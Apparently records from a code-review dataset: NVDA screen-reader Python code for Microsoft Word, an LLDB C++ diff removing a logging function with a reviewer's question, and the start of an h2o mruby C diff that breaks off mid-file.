WordDocumentTextInfo(self.obj,None,_rangeObj=self._rangeObj) def _get_text(self): text=self._rangeObj.text if not text: text="" return text def _move(self,unit,direction,endPoint=None,_rangeObj=None): if not _rangeObj: _rangeObj=self._rangeObj if unit in NVDAUnitsToWordUnits: unit=NVDAUnitsToWordUnits[unit] else: raise NotImplementedError("unit: %s"%unit) if endPoint=="start": moveFunc=_rangeObj.MoveStart elif endPoint=="end": moveFunc=_rangeObj.MoveEnd else: moveFunc=_rangeObj.Move res=moveFunc(unit,direction) #units higher than character and word expand to contain the last text plus the insertion point offset in the document #However move from a character before will incorrectly move to this offset which makes move/expand contridictory to each other #Make sure that move fails if it lands on the final offset but the unit is bigger than character/word if (direction>0 and endPoint!="end" and unit not in (wdCharacter,wdWord) # moving by units of line or more and (_rangeObj.start+1) == self.obj.WinwordDocumentObject.range().end # character after the range start is the end of the document range ): return 0 return res def move(self,unit,direction,endPoint=None): if unit!=textInfos.UNIT_LINE: return self._move(unit,direction,endPoint) if direction==0 or direction>1 or direction<-1: raise NotImplementedError("moving by line is only supported collapsed and with a count of 1 or -1") oldOffset=self._rangeObj.end if endPoint=="end" else self._rangeObj.start newOffset=ctypes.c_long() # Try moving by line making use of the selection temporarily res=NVDAHelper.localLib.nvdaInProcUtils_winword_moveByLine(self.obj.appModule.helperLocalBindingHandle,self.obj.documentWindowHandle,oldOffset,1 if direction<0 else 0,ctypes.byref(newOffset)) if res==0: res=direction newOffset=newOffset.value if direction<0 and not endPoint and newOffset==oldOffset: # Moving backwards by line seemed to not move. # Therefore fallback to moving back a character, expanding to line and collapsing to start instead. self.move(textInfos.UNIT_CHARACTER,-1) self.expand(unit) self.collapse() elif direction>0 and not endPoint and newOffset<oldOffset: # Moving forward by line seems to have wrapped back before the original position # This can happen in some tables with merged rows. # Try moving forward by cell, but if that fails, jump past the entire table. res=self.move(textInfos.UNIT_CELL,direction,endPoint) if res==0: self.expand(textInfos.UNIT_TABLE) self.collapse(end=True) else: # the move by line using the selection succeeded. Therefore update this TextInfo's position. if not endPoint: self._rangeObj.setRange(newOffset,newOffset) elif endPoint=="start": self._rangeObj.start=newOffset elif endPoint=="end": self._rangeObj.end=newOffset return res def _get_bookmark(self): return textInfos.offsets.Offsets(self._rangeObj.Start,self._rangeObj.End) def _get_pointAtStart(self): left = ctypes.c_int() top = ctypes.c_int() width = ctypes.c_int() height = ctypes.c_int() try: self.obj.WinwordWindowObject.GetPoint(ctypes.byref(left), ctypes.byref(top), ctypes.byref(width), ctypes.byref(height), self._rangeObj) except COMError: raise LookupError if not any((left.value, top.value, width.value, height.value)): raise LookupError return locationHelper.Point(left.value, top.value) def updateCaret(self): self.obj.WinwordWindowObject.ScrollIntoView(self._rangeObj) self.obj.WinwordSelectionObject.SetRange(self._rangeObj.Start,self._rangeObj.Start) def updateSelection(self): self.obj.WinwordWindowObject.ScrollIntoView(self._rangeObj) self.obj.WinwordSelectionObject.SetRange(self._rangeObj.Start,self._rangeObj.End) def getMathMl(self, field): try: import mathType except: raise LookupError("MathType not installed") rangeObj = self._rangeObj.Duplicate rangeObj.Start = int(field["shapeoffset"]) obj = rangeObj.InlineShapes[0].OLEFormat try: return mathType.getMathMl(obj) except: log.debugWarning("Error fetching math with mathType", exc_info=True) raise LookupError("Couldn't get MathML from MathType") class BrowseModeWordDocumentTextInfo(browseMode.BrowseModeDocumentTextInfo,treeInterceptorHandler.RootProxyTextInfo): def __init__(self,obj,position,_rangeObj=None): if isinstance(position,WordDocument): position=textInfos.POSITION_CARET super(BrowseModeWordDocumentTextInfo,self).__init__(obj,position,_rangeObj=_rangeObj) def _get_focusableNVDAObjectAtStart(self): return self.obj.rootNVDAObject class WordDocumentTreeInterceptor(browseMode.BrowseModeDocumentTreeInterceptor): TextInfo=BrowseModeWordDocumentTextInfo def _activateLongDesc(self,controlField): longDesc=controlField.get('longdescription') # Translators: the title of the message dialog desplaying an MS Word table description. ui.browseableMessage(longDesc,_("Table description")) def _get_isAlive(self): return winUser.isWindow(self.rootNVDAObject.windowHandle) def __contains__(self,obj): return obj==self.rootNVDAObject def _get_ElementsListDialog(self): return ElementsListDialog def _iterHeadings(self,nodeType,direction,rangeObj,includeCurrent): neededLevel=int(nodeType[7:]) if len(nodeType)>7 else 0 isFirst=True while True: if not isFirst or includeCurrent: level=rangeObj.paragraphs[1].outlineLevel if level and 0<level<10 and (not neededLevel or neededLevel==level): rangeObj.expand(wdParagraph) yield WordDocumentHeadingQuickNavItem(nodeType,self,BrowseModeWordDocumentTextInfo(self,None,_rangeObj=rangeObj),level) isFirst=False if direction=="next": newRangeObj=rangeObj.gotoNext(wdGoToHeading) if not newRangeObj or newRangeObj.start<=rangeObj.start: break elif direction=="previous": newRangeObj=rangeObj.gotoPrevious(wdGoToHeading) if not newRangeObj or newRangeObj.start>=rangeObj.start: break rangeObj=newRangeObj def _iterNodesByType(self,nodeType,direction="next",pos=None): if pos: rangeObj=pos.innerTextInfo._rangeObj else: rangeObj=self.rootNVDAObject.WinwordDocumentObject.range(0,0) includeCurrent=False if pos else True if nodeType=="link": return LinkWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() elif nodeType=="annotation": comments=CommentWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() revisions=RevisionWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() return browseMode.mergeQuickNavItemIterators([comments,revisions],direction) elif nodeType in ("table","container"): return TableWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() elif nodeType=="error": return SpellingErrorWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() elif nodeType=="graphic": return GraphicWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() elif nodeType=="chart": return ChartWinWordCollectionQuicknavIterator(nodeType,self,direction,rangeObj,includeCurrent).iterate() elif nodeType.startswith('heading'): return self._iterHeadings(nodeType,direction,rangeObj,includeCurrent) else: raise NotImplementedError def _activatePosition(self, info=None): if not info: info=self.makeTextInfo(textInfos.POSITION_CARET) info.activate() def script_nextRow(self,gesture): self.rootNVDAObject._moveInTable(row=True,forward=True) braille.handler.handleCaretMove(self) def script_previousRow(self,gesture): self.rootNVDAObject._moveInTable(row=True,forward=False) braille.handler.handleCaretMove(self) def script_nextColumn(self,gesture): self.rootNVDAObject._moveInTable(row=False,forward=True) braille.handler.handleCaretMove(self) def script_previousColumn(self,gesture): self.rootNVDAObject._moveInTable(row=False,forward=False) braille.handler.handleCaretMove(self) __gestures={ "kb:tab":"trapNonCommandGesture", "kb:shift+tab":"trapNonCommandGesture", "kb:control+alt+upArrow": "previousRow", "kb:control+alt+downArrow": "nextRow", "kb:control+alt+leftArrow": "previousColumn", "kb:control+alt+rightArrow": "nextColumn", # We want to fall back to MS Word's real page up and page down, rather than browseMode's faked 25 lines "kb:pageUp":None, "kb:pageDown":None, "kb:shift+pageUp":None, "kb:shift+pageDown":None, } class WordDocument(Window): def winwordColorToNVDAColor(self,val): if val>=0: # normal RGB value return colors.RGB.fromCOLORREF(val).name elif (val&0xffffffff)==0xff000000: # Translators: the default (automatic) color in Microsoft Word return _("default color") elif ((val>>28)&0xf)==0xd and ((val>>16)&0xff)==0x00: # An MS word color index Plus intencity # Made up of MS Word Theme Color index, hsv value ratio (MS Word darker percentage) and hsv saturation ratio (MS Word lighter percentage) # Info: http://www.wordarticles.com/Articles/Colours/2007.php#UIConsiderations saturationRatio=(val&0xff)/255.0 valueRatio=((val>>8)&0xff)/255.0 themeColorIndex=(val>>24)&0x0f # Convert the MS Word theme color index to an MS Office color scheme index schemeColorIndex=WdThemeColorIndexToMsoThemeColorSchemeIndex[themeColorIndex] # Lookup the rgb value for the MS Office scheme color index based on the current theme colorref=self.WinwordDocumentObject.documentTheme.themeColorScheme(schemeColorIndex).rgb # Convert the rgb value to hsv and apply the saturation and value ratios rgb=tuple(x/255.0 for x in colors.RGB.fromCOLORREF(colorref)) hsv=colorsys.rgb_to_hsv(*rgb) hsv=(hsv[0],hsv[1]*saturationRatio,hsv[2]*valueRatio) rgb=colorsys.hsv_to_rgb(*hsv) name=colors.RGB(rgb[0]*255,rgb[1]*255,rgb[2]*255).name return name else: raise ValueError("Unknown color format %x %x %x %x"%((val>>24)&0xff,(val>>16)&0xff,(val>>8)&0xff,val&0xff)) def _get_WinwordVersion(self): if not hasattr(self,'_WinwordVersion'): self._WinwordVersion=float(self.WinwordApplicationObject.version) return self._WinwordVersion def _get_documentWindowHandle(self): return self.windowHandle def _get_WinwordWindowObject(self): if not getattr(self,'_WinwordWindowObject',None): try: pDispatch=oleacc.AccessibleObjectFromWindow(self.documentWindowHandle,winUser.OBJID_NATIVEOM,interface=comtypes.automation.IDispatch) except (COMError, WindowsError): log.debugWarning("Could not get MS Word object model from window %s with class %s"%(self.documentWindowHandle,winUser.getClassName(self.documentWindowHandle)),exc_info=True) return None self._WinwordWindowObject=comtypes.client.dynamic.Dispatch(pDispatch) return self._WinwordWindowObject def _get_WinwordDocumentObject(self): if not getattr(self,'_WinwordDocumentObject',None): windowObject=self.WinwordWindowObject if not windowObject: return None self._WinwordDocumentObject=windowObject.document return self._WinwordDocumentObject def _get_WinwordApplicationObject(self): if not getattr(self,'_WinwordApplicationObject',None): self._WinwordApplicationObject=self.WinwordWindowObject.application return self._WinwordApplicationObject def _get_WinwordSelectionObject(self): if not getattr(self,'_WinwordSelectionObject',None): windowObject=self.WinwordWindowObject if not windowObject: return None self._WinwordSelectionObject=windowObject.selection return self._WinwordSelectionObject def _WaitForValueChangeForAction(self,action,fetcher,timeout=0.15): oldVal=fetcher() action() startTime=curTime=time.time() curVal=fetcher() while curVal==oldVal and (curTime-startTime)<timeout: time.sleep(0.01) curVal=fetcher() curTime=time.time() return curVal def script_toggleBold(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: self.WinwordSelectionObject.font.bold) if val: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Bold on")) else: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Bold off")) def script_toggleItalic(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: self.WinwordSelectionObject.font.italic) if val: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Italic on")) else: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Italic off")) def script_toggleUnderline(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: self.WinwordSelectionObject.font.underline) if val: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Underline on")) else: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Underline off")) def script_toggleAlignment(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: self.WinwordSelectionObject.paragraphFormat.alignment) alignmentMessages={ # Translators: a an alignment in Microsoft Word wdAlignParagraphLeft:_("Left aligned"), # Translators: a an alignment in Microsoft Word wdAlignParagraphCenter:_("centered"), # Translators: a an alignment in Microsoft Word wdAlignParagraphRight:_("Right aligned"), # Translators: a an alignment in Microsoft Word wdAlignParagraphJustify:_("Justified"), } msg=alignmentMessages.get(val) if msg: ui.message(msg) @script(gestures=["kb:control+m", "kb:control+shift+m", "kb:control+t", "kb:control+shift+t"]) def script_changeParagraphLeftIndent(self, gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, # or it's within Windows Defender Application Guard. # For now, just let the gesture through and don't report anything. return gesture.send() margin = self.WinwordDocumentObject.PageSetup.LeftMargin val = self._WaitForValueChangeForAction( lambda: gesture.send(), lambda: self.WinwordSelectionObject.paragraphFormat.LeftIndent ) msg = self.getLocalizedMeasurementTextForPointSize(margin + val) ui.message(msg) def script_toggleSuperscriptSubscript(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: (self.WinwordSelectionObject.font.superscript,self.WinwordSelectionObject.font.subscript)) if val[0]: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Superscript")) elif val[1]: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Subscript")) else: # Translators: a message when toggling formatting in Microsoft word ui.message(_("Baseline")) def script_moveParagraphDown(self,gesture): oldBookmark=self.makeTextInfo(textInfos.POSITION_CARET).bookmark gesture.send() if self._hasCaretMoved(oldBookmark)[0]: info=self.makeTextInfo(textInfos.POSITION_SELECTION) info.collapse() info.move(textInfos.UNIT_PARAGRAPH,-1,endPoint="start") lastParaText=info.text.strip() if lastParaText: # Translators: a message reported when a paragraph is moved below another paragraph ui.message(_("Moved below %s")%lastParaText) else: # Translators: a message reported when a paragraph is moved below a blank paragraph ui.message(_("Moved below blank paragraph")) def script_moveParagraphUp(self,gesture): oldBookmark=self.makeTextInfo(textInfos.POSITION_CARET).bookmark gesture.send() if self._hasCaretMoved(oldBookmark)[0]: info=self.makeTextInfo(textInfos.POSITION_SELECTION) info.collapse() info.move(textInfos.UNIT_PARAGRAPH,1) info.expand(textInfos.UNIT_PARAGRAPH) lastParaText=info.text.strip() if lastParaText: # Translators: a message reported when a paragraph is moved above another paragraph ui.message(_("Moved above %s")%lastParaText) else: # Translators: a message reported when a paragraph is moved above a blank paragraph ui.message(_("Moved above blank paragraph")) def script_increaseDecreaseOutlineLevel(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: self.WinwordSelectionObject.paragraphFormat.outlineLevel) style=self.WinwordSelectionObject.style.nameLocal # Translators: the message when the outline level / style is changed in Microsoft word ui.message(_("{styleName} style, outline level {outlineLevel}").format(styleName=style,outlineLevel=val)) def script_increaseDecreaseFontSize(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda: self.WinwordSelectionObject.font.size) # Translators: a message when increasing or decreasing font size in Microsoft Word ui.message(_("{size:g} point font").format(size=val)) @script(gesture="kb:control+shift+8") def script_toggleDisplayNonprintingCharacters(self, gesture): if not self.WinwordWindowObject: # We cannot fetch the Word object model, so we therefore cannot report the status change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, # or it's within Windows Defender Application Guard. # In this case, just let the gesture through and don't report anything. return gesture.send() val = self._WaitForValueChangeForAction( lambda: gesture.send(), lambda: self.WinwordWindowObject.ActivePane.View.ShowAll ) if val: # Translators: a message when toggling Display Nonprinting Characters in Microsoft word ui.message(_("Display nonprinting characters")) else: # Translators: a message when toggling Display Nonprinting Characters in Microsoft word ui.message(_("Hide nonprinting characters")) @script(gestures=["kb:tab", "kb:shift+tab"]) def script_tab(self,gesture): """ A script for the tab key which: * if in a table, announces the newly selected cell or new cell where the caret is, or * If not in a table, announces the distance of the caret from the left edge of the document, and any remaining text on that line. """ gesture.send() self.reportTab() def reportTab(self): selectionObj=self.WinwordSelectionObject inTable=selectionObj.tables.count>0 if selectionObj else False info=self.makeTextInfo(textInfos.POSITION_SELECTION) isCollapsed=info.isCollapsed if inTable and isCollapsed: info.expand(textInfos.UNIT_PARAGRAPH) isCollapsed=info.isCollapsed if not isCollapsed: speech.speakTextInfo(info, reason=controlTypes.OutputReason.FOCUS) braille.handler.handleCaretMove(self) if selectionObj and isCollapsed: offset=selectionObj.information(wdHorizontalPositionRelativeToPage) msg=self.getLocalizedMeasurementTextForPointSize(offset) ui.message(msg) if selectionObj.paragraphs[1].range.start==selectionObj.start: info.expand(textInfos.UNIT_LINE) speech.speakTextInfo(info, unit=textInfos.UNIT_LINE, reason=controlTypes.OutputReason.CARET) def getLocalizedMeasurementTextForPointSize(self,offset): options=self.WinwordApplicationObject.options useCharacterUnit=options.useCharacterUnit if useCharacterUnit: offset=offset/self.WinwordSelectionObject.font.size # Translators: a measurement in Microsoft Word return _("{offset:.3g} characters").format(offset=offset) else: unit=options.measurementUnit if unit==wdInches: offset=offset/72.0 # Translators: a measurement in Microsoft Word return _("{offset:.3g} inches").format(offset=offset) elif unit==wdCentimeters: offset=offset/28.35 # Translators: a measurement in Microsoft Word return _("{offset:.3g} centimeters").format(offset=offset) elif unit==wdMillimeters: offset=offset/2.835 # Translators: a measurement in Microsoft Word return _("{offset:.3g} millimeters").format(offset=offset) elif unit==wdPoints: # Translators: a measurement in Microsoft Word return _("{offset:.3g} points").format(offset=offset) elif unit==wdPicas: offset=offset/12.0 # Translators: a measurement in Microsoft Word # See http://support.microsoft.com/kb/76388 for details. return _("{offset:.3g} picas").format(offset=offset) def script_changeLineSpacing(self,gesture): if not self.WinwordSelectionObject: # We cannot fetch the Word object model, so we therefore cannot report the format change. # The object model may be unavailable because this is a pure UIA implementation such as Windows 10 Mail, or its within Windows Defender Application Guard. # Eventually UIA will have its own way of detecting format changes at the cursor. For now, just let the gesture through and don't erport anything. return gesture.send() val=self._WaitForValueChangeForAction(lambda: gesture.send(),lambda:self.WinwordSelectionObject.ParagraphFormat.LineSpacingRule) if val == wdLineSpaceSingle: # Translators: a message when switching to single line spacing in Microsoft word ui.message(_("Single line spacing")) elif val == wdLineSpaceDouble: # Translators: a message when switching to double line spacing in Microsoft word ui.message(_("Double line spacing")) elif val == wdLineSpace1pt5: # Translators: a message when switching to 1.5 line spaceing in Microsoft word ui.message(_("1.5 line spacing")) def initOverlayClass(self): if isinstance(self, EditableTextWithoutAutoSelectDetection): self.bindGesture("kb:alt+shift+home", "caret_changeSelection") self.bindGesture("kb:alt+shift+end", "caret_changeSelection") self.bindGesture("kb:alt+shift+pageUp", "caret_changeSelection",) self.bindGesture("kb:alt+shift+pageDown", "caret_changeSelection",) __gestures = { "kb:control+[":"increaseDecreaseFontSize", "kb:control+]":"increaseDecreaseFontSize", "kb:control+shift+,":"increaseDecreaseFontSize", "kb:control+shift+.":"increaseDecreaseFontSize", "kb:control+b":"toggleBold", "kb:control+i":"toggleItalic", "kb:control+u":"toggleUnderline", "kb:control+=":"toggleSuperscriptSubscript", "kb:control+shift+=":"toggleSuperscriptSubscript", "kb:control+l":"toggleAlignment", "kb:control+e":"toggleAlignment", "kb:control+r":"toggleAlignment", "kb:control+j":"toggleAlignment", "kb:alt+shift+downArrow":"moveParagraphDown", "kb:alt+shift+upArrow":"moveParagraphUp", "kb:alt+shift+rightArrow":"increaseDecreaseOutlineLevel", "kb:alt+shift+leftArrow":"increaseDecreaseOutlineLevel", "kb:control+shift+n":"increaseDecreaseOutlineLevel", "kb:control+alt+1":"increaseDecreaseOutlineLevel", "kb:control+alt+2":"increaseDecreaseOutlineLevel", "kb:control+alt+3":"increaseDecreaseOutlineLevel", "kb:control+1":"changeLineSpacing", "kb:control+2":"changeLineSpacing", "kb:control+5":"changeLineSpacing", "kb:control+pageUp": "caret_moveByLine", "kb:control+pageDown": "caret_moveByLine", } class WordDocument_WwN(WordDocument): def _get_documentWindowHandle(self): w=NVDAHelper.localLib.findWindowWithClassInThread(self.windowThreadID,u"_WwG",True) if not w: log.debugWarning("Could not find window for class _WwG in thread.") w=super(WordDocument_WwN,self).documentWindowHandle return w def _get_WinwordWindowObject(self): window=super(WordDocument_WwN,self).WinwordWindowObject if not window: return None try: return window.application.activeWindow.activePane except COMError: log.debugWarning("Unable to get activePane") return window.application.windows[1].activePane __gestures={ "kb:tab":None, "kb:shift+tab":None, } class ElementsListDialog(browseMode.ElementsListDialog): ELEMENT_TYPES=(browseMode.ElementsListDialog.ELEMENT_TYPES[0],browseMode.ElementsListDialog.ELEMENT_TYPES[1], # Translators: The label of a radio button to select the type of element # in the browse mode Elements List dialog. ("annotation", _("&Annotations")), # Translators: The label of a radio button to select the type of element # in the browse mode Elements List dialog. ("chart", _("&Charts")), # Translators: The label of a radio button to select the type of element # in the browse mode Elements List dialog. ("error", _("&Errors")), )
1
33,835
This line is unnecessary.
nvaccess-nvda
py
@@ -119,13 +119,4 @@ Recorder::~Recorder() { UpdateBoundary(); } -void Recorder::Log(unsigned id) { -#ifndef LLDB_REPRO_INSTR_TRACE - LLDB_LOG(GetLogIfAllCategoriesSet(LIBLLDB_LOG_API), "Recording {0}: {1}", id, - m_pretty_func); -#else - llvm::errs() << "Recording " << id << ": " << m_pretty_func << "\n"; -#endif -} - bool lldb_private::repro::Recorder::g_global_boundary;
1
//===-- ReproducerInstrumentation.cpp ---------------------------*- C++ -*-===// // // Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. // See https://llvm.org/LICENSE.txt for license information. // SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception // //===----------------------------------------------------------------------===// #include "lldb/Utility/ReproducerInstrumentation.h" #include "lldb/Utility/Reproducer.h" using namespace lldb_private; using namespace lldb_private::repro; void *IndexToObject::GetObjectForIndexImpl(unsigned idx) { return m_mapping.lookup(idx); } void IndexToObject::AddObjectForIndexImpl(unsigned idx, void *object) { assert(idx != 0 && "Cannot add object for sentinel"); m_mapping[idx] = object; } template <> char *Deserializer::Deserialize<char *>() { return const_cast<char *>(Deserialize<const char *>()); } template <> const char *Deserializer::Deserialize<const char *>() { auto pos = m_buffer.find('\0'); if (pos == llvm::StringRef::npos) return nullptr; const char *str = m_buffer.data(); m_buffer = m_buffer.drop_front(pos + 1); return str; } bool Registry::Replay(const FileSpec &file) { auto error_or_file = llvm::MemoryBuffer::getFile(file.GetPath()); if (auto err = error_or_file.getError()) return false; return Replay((*error_or_file)->getBuffer()); } bool Registry::Replay(llvm::StringRef buffer) { #ifndef LLDB_REPRO_INSTR_TRACE Log *log = GetLogIfAllCategoriesSet(LIBLLDB_LOG_API); #endif Deserializer deserializer(buffer); while (deserializer.HasData(1)) { unsigned id = deserializer.Deserialize<unsigned>(); #ifndef LLDB_REPRO_INSTR_TRACE LLDB_LOG(log, "Replaying {0}: {1}", id, GetSignature(id)); #else llvm::errs() << "Replaying " << id << ": " << GetSignature(id) << "\n"; #endif GetReplayer(id)->operator()(deserializer); } return true; } void Registry::DoRegister(uintptr_t RunID, std::unique_ptr<Replayer> replayer, SignatureStr signature) { const unsigned id = m_replayers.size() + 1; assert(m_replayers.find(RunID) == m_replayers.end()); m_replayers[RunID] = std::make_pair(std::move(replayer), id); m_ids[id] = std::make_pair(m_replayers[RunID].first.get(), std::move(signature)); } unsigned Registry::GetID(uintptr_t addr) { unsigned id = m_replayers[addr].second; assert(id != 0 && "Forgot to add function to registry?"); return id; } std::string Registry::GetSignature(unsigned id) { assert(m_ids.count(id) != 0 && "ID not in registry"); return m_ids[id].second.ToString(); } Replayer *Registry::GetReplayer(unsigned id) { assert(m_ids.count(id) != 0 && "ID not in registry"); return m_ids[id].first; } std::string Registry::SignatureStr::ToString() const { return (result + (result.empty() ? "" : " ") + scope + "::" + name + args) .str(); } unsigned ObjectToIndex::GetIndexForObjectImpl(const void *object) { unsigned index = m_mapping.size() + 1; auto it = m_mapping.find(object); if (it == m_mapping.end()) m_mapping[object] = index; return m_mapping[object]; } Recorder::Recorder(llvm::StringRef pretty_func, std::string &&pretty_args) : m_serializer(nullptr), m_pretty_func(pretty_func), m_pretty_args(pretty_args), m_local_boundary(false), m_result_recorded(true) { if (!g_global_boundary) { g_global_boundary = true; m_local_boundary = true; LLDB_LOG(GetLogIfAllCategoriesSet(LIBLLDB_LOG_API), "{0} ({1})", m_pretty_func, m_pretty_args); } } Recorder::~Recorder() { assert(m_result_recorded && "Did you forget LLDB_RECORD_RESULT?"); UpdateBoundary(); } void Recorder::Log(unsigned id) { #ifndef LLDB_REPRO_INSTR_TRACE LLDB_LOG(GetLogIfAllCategoriesSet(LIBLLDB_LOG_API), "Recording {0}: {1}", id, m_pretty_func); #else llvm::errs() << "Recording " << id << ": " << m_pretty_func << "\n"; #endif } bool lldb_private::repro::Recorder::g_global_boundary;
1
19,981
How did this compile in the first place? Is there a matching declaration in a header that should be removed too?
apple-swift-lldb
cpp
@@ -56,7 +56,8 @@ mrb_value h2o_mruby__new_str(mrb_state *mrb, const char *s, size_t len, const ch if (mrb->exc != NULL) h2o_mruby__abort_exc(mrb, "h2o_mruby_new_str:precondition failure", file, line); mrb_value ret = mrb_str_new(mrb, s, len); - h2o_mruby_assert(mrb); + if (mrb->exc != NULL) + h2o_mruby__abort_exc(mrb, "h2o_mruby_new_str:failed to create string:", file, line); return ret; }
1
/* * Copyright (c) 2014-2016 DeNA Co., Ltd., Kazuho Oku, Ryosuke Matsumoto, * Masayoshi Takahashi * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to * deal in the Software without restriction, including without limitation the * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or * sell copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS * IN THE SOFTWARE. */ #include <errno.h> #include <inttypes.h> #include <stdio.h> #include <stdlib.h> #include <mruby.h> #include <mruby/proc.h> #include <mruby/array.h> #include <mruby/class.h> #include <mruby/compile.h> #include <mruby/error.h> #include <mruby/hash.h> #include <mruby/opcode.h> #include <mruby/string.h> #include <mruby/throw.h> #include <mruby/variable.h> #include <mruby_input_stream.h> #include "h2o.h" #include "h2o/mruby_.h" #include "mruby/embedded.c.h" #define STATUS_FALLTHRU 399 #define FALLTHRU_SET_PREFIX "x-fallthru-set-" #define FREEZE_STRING(v) MRB_SET_FROZEN_FLAG(mrb_obj_ptr(v)) void h2o_mruby__abort_exc(mrb_state *mrb, const char *mess, const char *file, int line) { fprintf(stderr, "%s at file: \"%s\", line %d: %s\n", mess, file, line, RSTRING_PTR(mrb_inspect(mrb, mrb_obj_value(mrb->exc)))); abort(); } mrb_value h2o_mruby__new_str(mrb_state *mrb, const char *s, size_t len, const char *file, int line) { if (mrb->exc != NULL) h2o_mruby__abort_exc(mrb, "h2o_mruby_new_str:precondition failure", file, line); mrb_value ret = mrb_str_new(mrb, s, len); h2o_mruby_assert(mrb); return ret; } static void on_gc_dispose_generator(mrb_state *mrb, void *_generator) { h2o_mruby_generator_t *generator = _generator; if (generator == NULL) return; generator->refs.generator = mrb_nil_value(); } const static struct mrb_data_type generator_type = {"generator", on_gc_dispose_generator}; h2o_mruby_generator_t *h2o_mruby_get_generator(mrb_state *mrb, mrb_value obj) { h2o_mruby_generator_t *generator = mrb_data_check_get_ptr(mrb, obj, &generator_type); return generator; } void h2o_mruby_setup_globals(mrb_state *mrb) { const char *root = getenv("H2O_ROOT"); if (root == NULL) root = H2O_TO_STR(H2O_ROOT); mrb_gv_set(mrb, mrb_intern_lit(mrb, "$H2O_ROOT"), h2o_mruby_new_str(mrb, root, strlen(root))); h2o_mruby_eval_expr(mrb, "$LOAD_PATH << \"#{$H2O_ROOT}/share/h2o/mruby\""); h2o_mruby_assert(mrb); /* require core modules and include built-in libraries */ h2o_mruby_eval_expr(mrb, "require \"#{$H2O_ROOT}/share/h2o/mruby/preloads.rb\""); if (mrb->exc != NULL) { if (mrb_obj_is_instance_of(mrb, mrb_obj_value(mrb->exc), mrb_class_get(mrb, "LoadError"))) { fprintf(stderr, "file \"%s/%s\" not found. Did you forget to run `make install`?\n", root, "share/h2o/mruby/preloads.rb"); } else { fprintf(stderr, "an error occurred while loading %s/%s: %s\n", root, "share/h2o/mruby/preloads.rb", RSTRING_PTR(mrb_inspect(mrb, 